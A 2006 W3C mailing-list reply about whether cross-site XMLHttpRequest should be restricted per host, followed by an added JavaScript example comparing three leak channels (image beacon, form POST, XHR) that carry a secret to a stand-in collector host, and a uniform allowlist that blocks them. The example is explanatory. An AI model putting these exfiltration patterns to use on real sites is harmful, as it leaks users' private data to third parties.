
Re: several messages

From: Jim Ley <jim@jibbering.com>
Date: Tue, 18 Apr 2006 22:50:17 +0100
Message-ID: <00e001c66332$15b95560$817ba8c0@Snufkin>
To: <public-webapi@w3.org>

"Ian Hickson" <ian@hixie.ch>
> On Tue, 18 Apr 2006, Ian Davis wrote:
>>
>> Those are interesting ideas but my proposal is specifically to limit the
>> scope of which 3rd party hosts can be accessed by the XHR object. Why is
>> that out of scope?
>
> Well, it seems you'd want all the restrictions in one place, rather than
> have restriction policies for each feature specced out separately. Also,
> it would be very strange to restrict XHR while not restricting the dozens
> of other ways of doing cross-site communication -- if what you're trying
> to do is leak information, you don't care whether you're using cross-site
> XMLHttpRequest or an older system (indeed, the older the better, as it'll
> work with more browsers).

The other leaking methods are not part of a standard: there's no standard
that says a UA must allow cross-domain form posts (indeed the majority offer
such a warning and the ability to deny it), and there's no standard that says
a UA must allow cross-domain image access; again, most UAs offer a mechanism
to block these.

Standardising something which would require it to be allowed is a different 
matter than simply pointing out that current behaviour in UAs is such that 
it's possible.

Jim. 
Received on Tuesday, 18 April 2006 21:51:53 GMT
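The channels the two replies argue over, as an added example that is not code from the thread or from any UA: a secret leaving a page through an <img> fetch, a form POST, and cross-site XMLHttpRequest all produce the same kind of cross-origin request, so a restriction that covers only XHR leaves the older channels open, and a per-host allowlist (a hypothetical user setting assumed here, not one the thread specifies) has to be applied to every outgoing request to close them. The page origin and collector host are constructed values; the block runs under Node using the WHATWG URL API.

```javascript
// Added example for this thread; not code from the mailing list or any UA.
// Models the argument in the replies above: a secret can leave a page through
// an <img> fetch or a form POST as easily as through cross-site XHR, so a
// restriction on XHR alone does not stop the leak, while one check applied to
// every outgoing request does. Origins, collector host and the allowlist
// policy are constructed assumptions for illustration. Runs under Node.

const PAGE_ORIGIN = "https://app.example";          // constructed: the page's own origin
const COLLECTOR = "https://collector.example/c";    // constructed: attacker's third-party host

// Reduce a URL to its origin (scheme + host + port), the unit the
// same-origin policy compares.
function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

function isCrossOrigin(pageOrigin, targetUrl) {
  return originOf(targetUrl) !== pageOrigin;
}

// Channel 1: <img src=...>. The secret rides in the query string; the UA
// issues the GET whether or not an image ever comes back.
function imageBeacon(secret) {
  const u = new URL(COLLECTOR);
  u.searchParams.set("d", secret);
  return { channel: "img", method: "GET", url: u.toString(), body: "" };
}

// Channel 2: <form method=post action=...> submitted by script. The page
// cannot read the response, but the secret has already left in the body.
function formPost(secret) {
  const body = new URLSearchParams({ d: secret }).toString();
  return { channel: "form", method: "POST", url: COLLECTOR, body };
}

// Channel 3: the cross-site XHR the thread is about.
function xhrPost(secret) {
  return { channel: "xhr", method: "POST", url: COLLECTOR,
           body: `d=${encodeURIComponent(secret)}` };
}

function allChannels(secret) {
  return [imageBeacon(secret), formPost(secret), xhrPost(secret)];
}

// Hypothetical single policy point: the user restricts which third-party
// origins a page may contact. It judges the request, not the API that
// produced it, so img, form and XHR are treated identically.
function policyAllows(pageOrigin, request, allowedOrigins) {
  if (!isCrossOrigin(pageOrigin, request.url)) return true;
  return allowedOrigins.includes(originOf(request.url));
}

// Channels that still leak when only XHR is restricted.
function leaksUnderXhrOnlyRestriction(secret, pageOrigin) {
  return allChannels(secret)
    .filter(r => r.channel !== "xhr" && isCrossOrigin(pageOrigin, r.url))
    .map(r => r.channel);
}

// Channels blocked when the same allowlist check covers every request.
function blockedUnderUniformPolicy(secret, pageOrigin, allowedOrigins) {
  return allChannels(secret)
    .filter(r => !policyAllows(pageOrigin, r, allowedOrigins))
    .map(r => r.channel);
}
```

With an empty allowlist the uniform policy blocks all three channels; restricting XHR alone leaves the image beacon and the form post untouched, which is the point Hixie makes about the older mechanisms.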
